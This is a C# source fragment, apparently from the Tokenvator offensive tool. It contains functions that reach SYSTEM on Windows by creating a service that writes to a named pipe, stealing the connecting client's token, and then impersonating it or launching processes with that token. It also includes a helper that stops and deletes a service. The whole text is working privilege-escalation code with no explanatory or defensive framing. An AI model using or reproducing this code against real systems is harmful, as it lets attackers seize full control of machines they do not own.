//////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// internal static void GetSystem() { Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator")); using (PSExec psExec = new PSExec("Tokenvator")) { psExec.Connect("."); psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator"); psExec.Open(); thread.Start(); waitHandle.WaitOne(); psExec.Start(); psExec.Stop(); } thread.Join(); if (IntPtr.Zero != hToken) { advapi32.ImpersonateLoggedOnUser(hToken); kernel32.CloseHandle(hToken); Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name); hToken = IntPtr.Zero; } }
//////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// internal static void GetSystem(String command, String arguments) { Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator")); using (PSExec psExec = new PSExec("Tokenvator")) { psExec.Connect("."); psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator"); psExec.Open(); thread.Start(); waitHandle.WaitOne(); psExec.Start(); psExec.Stop(); } thread.Join(); Create createProcess; if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId) { createProcess = CreateProcess.CreateProcessWithLogonW; } else { createProcess = CreateProcess.CreateProcessWithTokenW; } createProcess(hToken, command, arguments); }
//////////////////////////////////////////////////////////////////////////////// // //////////////////////////////////////////////////////////////////////////////// private static void _UnInstallDriver(CommandLineParsing cLP) { string service; if (cLP.GetData("servicename", out service)) { using (PSExec p = new PSExec(service)) { if (!p.Connect(".")) { return; } if (!p.Open()) { return; } if (!p.Stop()) { return; } if (!p.Delete()) { return; } } } else { Console.WriteLine("[-] Unable to identify /Service"); } }